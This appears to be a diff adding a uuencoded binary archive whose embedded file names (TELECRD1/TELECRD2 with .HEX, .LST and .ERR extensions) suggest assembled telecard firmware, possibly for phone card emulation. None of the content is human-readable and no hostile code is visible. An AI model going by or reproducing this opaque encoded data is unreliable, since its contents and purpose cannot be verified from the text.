+MTJAQ<MNB>2>_=TZ&<V\Q;$XX;WI@LHMS(IR>^ODFB[?L!E`*-.XC*[A;8,$H
+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
